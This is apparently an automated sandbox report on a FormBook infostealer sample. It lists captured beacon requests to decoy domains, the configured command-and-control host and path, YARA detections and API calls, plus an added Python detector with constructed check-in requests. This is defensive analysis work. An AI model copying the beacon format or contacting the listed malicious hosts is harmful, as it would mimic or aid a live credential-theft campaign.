Source: global traffic | HTTP traffic detected: GET /aqu2/?mbyD=wtLrPw5EqSQfBmzZFC+8Ts+SNzTM/uZNWoE4YkZin0I3f7v8IKK2ESUj0jO/FukH5b4y&EhUtvx=xdFt3xAHnXiTPL3p HTTP/1.1 | Host: www.autobrehna.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (7 NUL bytes, nothing printable)
Source: global traffic | HTTP traffic detected: GET /aqu2/?mbyD=G7QIB1zUm5r+y6hLlZB4xuNK9AxtrOyX5//PKXARlhVXvhDVDTjLo0W6kfT9OEzqeU0h&EhUtvx=xdFt3xAHnXiTPL3p HTTP/1.1 | Host: www.appgusher.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (7 NUL bytes, nothing printable)
Source: global traffic | HTTP traffic detected: GET /aqu2/?EhUtvx=xdFt3xAHnXiTPL3p&mbyD=s0A+R2zrZH16LfLMe9M/AmUzyN8aP2GBLvlZkca4zy1idqDqw+DRrqUwOXi4yQd3lVO7 HTTP/1.1 | Host: www.thesixteenthround.net | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (7 NUL bytes, nothing printable)
Source: Joe Sandbox View | IP Address: 91.195.240.94
Source: Joe Sandbox View | ASN Name: SEDO-ASDE
Source: Joe Sandbox View | ASN Name: HETZNER-ASDE
Source: unknown | DNS traffic detected: queries for: www.biehnrecords.com
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Thu, 08 Apr 2021 08:49:05 GMT | Server: Apache/2.4.41 (Ubuntu) | Content-Length: 276 | Connection: close | Content-Type: text/html; charset=iso-8859-1
  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 70 6d 72 61 63 6b 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at www.pmrack.com Port 80</address></body></html>
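Every request captured above goes to a host from the decoy list in the extracted configuration (biehnrecords, bedpee, pmrack, qcmax and so on), not to the configured C2 www.stone-master.info, and all share one shape: a GET to the configured path /aqu2/ with two query parameters, one of them the same 16-character value (EhUtvx=xdFt3xAHnXiTPL3p) in every request, Connection: close, no User-Agent header (the "HTTP GET or POST without a user agent" signature), and seven NUL bytes following the GET. The one reply shown, from the decoy www.pmrack.com, is an ordinary Apache 404. The Python below is an added example, not part of the report or of the Snort rule set that fired: it parses raw HTTP requests, looks the Host header up against the configured C2 and decoy domains, and scores the request shape. CONFIG carries the C2 entry and a subset of the decoys from the page; the three request samples are constructed (the one to the C2 host was not observed in this run), and the verdict thresholds are my own.

```python
"""Added example: classify HTTP requests against the extracted FormBook
configuration and the request shape seen in this report.  Not part of
the Joe Sandbox report; CONFIG is copied from the page (decoy list cut
down), the requests below are constructed."""
from urllib.parse import parse_qsl, urlsplit

CONFIG = {
    "C2 list": ["www.stone-master.info/aqu2/"],
    # subset of the 64 decoy domains printed under Malware Configuration
    "decoy": ["thesixteenthround.net", "pmrack.com", "qcmax.com", "420vaca.com",
              "biehnrecords.com", "bedpee.com", "appgusher.com", "autobrehna.com"],
}


def parse_request(raw: bytes):
    """Split a raw HTTP/1.1 request into (method, target, headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers, body


def _norm(host: str) -> str:
    host = host.lower()
    return host[4:] if host.startswith("www.") else host


def classify(raw: bytes, config=CONFIG) -> dict:
    """Score one request; returns host, configured role, verdict, reasons."""
    method, target, headers, body = parse_request(raw)
    c2_host, _, c2_path = config["C2 list"][0].partition("/")
    c2_path = "/" + c2_path                      # "/aqu2/"
    host = _norm(headers.get("host", ""))
    url = urlsplit(target)
    reasons = []

    role = None
    if host == _norm(c2_host):
        role = "c2"
    elif host in {_norm(d) for d in config["decoy"]}:
        role = "decoy"
    if role:
        reasons.append(f"host is a configured {role} domain")
    if url.path == c2_path:
        reasons.append(f"URI path {c2_path} from the configuration")
    if "user-agent" not in headers:
        reasons.append("no User-Agent header")
    if headers.get("connection", "").lower() == "close":
        reasons.append("Connection: close")
    if method == "GET" and body and body == b"\x00" * len(body):
        reasons.append(f"{len(body)} NUL bytes after a GET")
    params = parse_qsl(url.query, keep_blank_values=True)
    if len(params) == 2 and any(len(v) == 16 for _, v in params):
        reasons.append("two query parameters, one 16 characters long")

    # Thresholds are this example's own choice, not from the report.
    if (role or url.path == c2_path) and len(reasons) >= 4:
        verdict = "formbook_checkin"
    elif len(reasons) >= 3:
        verdict = "suspicious"
    else:
        verdict = "benign"
    return {"host": host, "role": role, "verdict": verdict, "reasons": reasons}


# Constructed from the first request above (decoy host)
CHECKIN = (b"GET /aqu2/?EhUtvx=xdFt3xAHnXiTPL3p&mbyD=Nog7saUMDwoWD2E1asrlCYsF2JarF3pmjxpXcoGpoLe9R6S6cRBIZYNmkdpvudxvP9hF HTTP/1.1\r\n"
           b"Host: www.biehnrecords.com\r\nConnection: close\r\n\r\n" + b"\x00" * 7)
# Same shape sent to the configured C2 host; not observed in this run
C2_CHECKIN = CHECKIN.replace(b"www.biehnrecords.com", b"www.stone-master.info")
# Ordinary browser request for contrast
BENIGN = (b"GET /index.html HTTP/1.1\r\nHost: www.example.com\r\n"
          b"User-Agent: Mozilla/5.0\r\nConnection: keep-alive\r\n\r\n")

if __name__ == "__main__":
    for r in (CHECKIN, C2_CHECKIN, BENIGN):
        print(classify(r))
```

The host lookup alone is enough to name the campaign once the configuration has been extracted; the shape checks are there for the case you have proxy logs but no extracted configuration, which is also why they yield only "suspicious" without a host or path match.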
Source: wlanext.exe, 00000009.00000002.955588839.0000000003712000.00000004.00000001.sdmp | String found in binary or memory: http://browsehappy.com/
Source: explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: wlanext.exe, 00000009.00000002.955588839.0000000003712000.00000004.00000001.sdmp | String found in binary or memory: http://produkte.web.de/homepage-und-mail/homepage-parken/
Source: explorer.exe, 00000005.00000002.955671038.0000000002B50000.00000002.00000001.sdmp | String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 1_2_00404EBC GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,lstrlenA,GlobalUnlock,SetClipboardData,CloseClipboard

          E-Banking Fraud:

          Yara detected FormBook
          Source: Yara match | File source: 00000009.00000002.954706104.0000000000CD0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000009.00000002.954738105.0000000000D00000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000003.00000001.697538747.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000002.704506840.000000001EB20000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000009.00000002.954361927.0000000000850000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000003.00000002.735925804.0000000000A00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000003.00000002.735695212.00000000005A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000003.00000002.735263364.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 3.2.eQLPRPErea.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.2.eQLPRPErea.exe.1eb20000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.2.eQLPRPErea.exe.1eb20000.5.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 3.1.eQLPRPErea.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 3.1.eQLPRPErea.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 3.2.eQLPRPErea.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: 00000009.00000002.954706104.0000000000CD0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.954706104.0000000000CD0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.954738105.0000000000D00000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.954738105.0000000000D00000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000001.697538747.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000001.697538747.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.704506840.000000001EB20000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.704506840.000000001EB20000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.954361927.0000000000850000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.954361927.0000000000850000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.735925804.0000000000A00000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.735925804.0000000000A00000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.735695212.00000000005A0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.735695212.00000000005A0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.735263364.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.735263364.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 3.2.eQLPRPErea.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.eQLPRPErea.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 1.2.eQLPRPErea.exe.1eb20000.5.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.eQLPRPErea.exe.1eb20000.5.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 1.2.eQLPRPErea.exe.1eb20000.5.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.eQLPRPErea.exe.1eb20000.5.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 3.1.eQLPRPErea.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.1.eQLPRPErea.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 3.1.eQLPRPErea.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.1.eQLPRPErea.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 3.2.eQLPRPErea.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.eQLPRPErea.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_004181D0 NtCreateFile | 3_2_004181D0
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00418280 NtReadFile | 3_2_00418280
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00418300 NtClose | 3_2_00418300
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_004183B0 NtAllocateVirtualMemory | 3_2_004183B0
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_004181CA NtCreateFile | 3_2_004181CA
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_0041827A NtReadFile | 3_2_0041827A
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_004182FA NtClose | 3_2_004182FA
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00AA98F0 NtReadVirtualMemory,LdrInitializeThunk | 3_2_00AA98F0
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00AA9860 NtQuerySystemInformation,LdrInitializeThunk | 3_2_00AA9860
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00AA9840 NtDelayExecution,LdrInitializeThunk | 3_2_00AA9840
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00AA99A0 NtCreateSection,LdrInitializeThunk | 3_2_00AA99A0
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00AA9910 NtAdjustPrivilegesToken,LdrInitializeThunk | 3_2_00AA9910
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00AA9A20 NtResumeThread,LdrInitializeThunk | 3_2_00AA9A20
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00AA9A00 NtProtectVirtualMemory,LdrInitializeThunk | 3_2_00AA9A00
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00AA9A50 NtCreateFile,LdrInitializeThunk | 3_2_00AA9A50
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00AA95D0 NtClose,LdrInitializeThunk | 3_2_00AA95D0
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00AA9540 NtReadFile,LdrInitializeThunk | 3_2_00AA9540
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00AA96E0 NtFreeVirtualMemory,LdrInitializeThunk | 3_2_00AA96E0
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00AA9660 NtAllocateVirtualMemory,LdrInitializeThunk | 3_2_00AA9660
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00AA97A0 NtUnmapViewOfSection,LdrInitializeThunk | 3_2_00AA97A0
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00AA9780 NtMapViewOfSection,LdrInitializeThunk | 3_2_00AA9780
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00AA9FE0 NtCreateMutant,LdrInitializeThunk | 3_2_00AA9FE0
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00AA9710 NtQueryInformationToken,LdrInitializeThunk | 3_2_00AA9710
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00AA98A0 NtWriteVirtualMemory | 3_2_00AA98A0
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00AA9820 NtEnumerateKey | 3_2_00AA9820
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00AAB040 NtSuspendThread | 3_2_00AAB040
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00AA99D0 NtCreateProcessEx | 3_2_00AA99D0
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00AA9950 NtQueueApcThread | 3_2_00AA9950
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00AA9A80 NtOpenDirectoryObject | 3_2_00AA9A80
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00AA9A10 NtQuerySection | 3_2_00AA9A10
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00AAA3B0 NtGetContextThread | 3_2_00AAA3B0
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00AA9B00 NtSetValueKey | 3_2_00AA9B00
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00AA95F0 NtQueryInformationFile | 3_2_00AA95F0
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00AA9520 NtWaitForSingleObject | 3_2_00AA9520
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00AAAD30 NtSetContextThread | 3_2_00AAAD30
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00AA9560 NtWriteFile | 3_2_00AA9560
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00AA96D0 NtCreateKey | 3_2_00AA96D0
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00AA9610 NtEnumerateValueKey | 3_2_00AA9610
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00AA9670 NtQueryInformationProcess | 3_2_00AA9670
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00AA9650 NtQueryValueKey | 3_2_00AA9650
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00AA9730 NtQueryVirtualMemory | 3_2_00AA9730
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00AAA710 NtOpenProcessToken | 3_2_00AAA710
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00AA9760 NtOpenProcess | 3_2_00AA9760
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00AA9770 NtSetInformationFile | 3_2_00AA9770
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00AAA770 NtOpenThread | 3_2_00AAA770
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_1_004181D0 NtCreateFile | 3_1_004181D0
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_1_00418280 NtReadFile | 3_1_00418280
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_1_00418300 NtClose | 3_1_00418300
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_1_004183B0 NtAllocateVirtualMemory | 3_1_004183B0
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_1_004181CA NtCreateFile | 3_1_004181CA
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_1_0041827A NtReadFile | 3_1_0041827A
          Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_1_004182FA NtClose | 3_1_004182FA
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_030C9A50 NtCreateFile,LdrInitializeThunk | 9_2_030C9A50
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_030C9910 NtAdjustPrivilegesToken,LdrInitializeThunk | 9_2_030C9910
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_030C99A0 NtCreateSection,LdrInitializeThunk | 9_2_030C99A0
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_030C9840 NtDelayExecution,LdrInitializeThunk | 9_2_030C9840
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_030C9860 NtQuerySystemInformation,LdrInitializeThunk | 9_2_030C9860
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_030C9710 NtQueryInformationToken,LdrInitializeThunk | 9_2_030C9710
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_030C9780 NtMapViewOfSection,LdrInitializeThunk | 9_2_030C9780
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_030C9FE0 NtCreateMutant,LdrInitializeThunk | 9_2_030C9FE0
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_030C9650 NtQueryValueKey,LdrInitializeThunk | 9_2_030C9650
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_030C9660 NtAllocateVirtualMemory,LdrInitializeThunk | 9_2_030C9660
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_030C96D0 NtCreateKey,LdrInitializeThunk | 9_2_030C96D0
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_030C96E0 NtFreeVirtualMemory,LdrInitializeThunk | 9_2_030C96E0
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_030C9540 NtReadFile,LdrInitializeThunk | 9_2_030C9540
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_030C95D0 NtClose,LdrInitializeThunk | 9_2_030C95D0
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_030C9B00 NtSetValueKey | 9_2_030C9B00
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_030CA3B0 NtGetContextThread | 9_2_030CA3B0
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_030C9A00 NtProtectVirtualMemory | 9_2_030C9A00
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_030C9A10 NtQuerySection | 9_2_030C9A10
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_030C9A20 NtResumeThread | 9_2_030C9A20
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_030C9A80 NtOpenDirectoryObject | 9_2_030C9A80
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_030C9950 NtQueueApcThread | 9_2_030C9950
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_030C99D0 NtCreateProcessEx | 9_2_030C99D0
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_030C9820 NtEnumerateKey | 9_2_030C9820
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_030CB040 NtSuspendThread | 9_2_030CB040
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_030C98A0 NtWriteVirtualMemory | 9_2_030C98A0
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_030C98F0 NtReadVirtualMemory | 9_2_030C98F0
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_030CA710 NtOpenProcessToken | 9_2_030CA710
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_030C9730 NtQueryVirtualMemory | 9_2_030C9730
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_030C9760 NtOpenProcess | 9_2_030C9760
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_030CA770 NtOpenThread | 9_2_030CA770
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_030C9770 NtSetInformationFile | 9_2_030C9770
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_030C97A0 NtUnmapViewOfSection | 9_2_030C97A0
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_030C9610 NtEnumerateValueKey | 9_2_030C9610
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_030C9670 NtQueryInformationProcess | 9_2_030C9670
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_030C9520 NtWaitForSingleObject | 9_2_030C9520
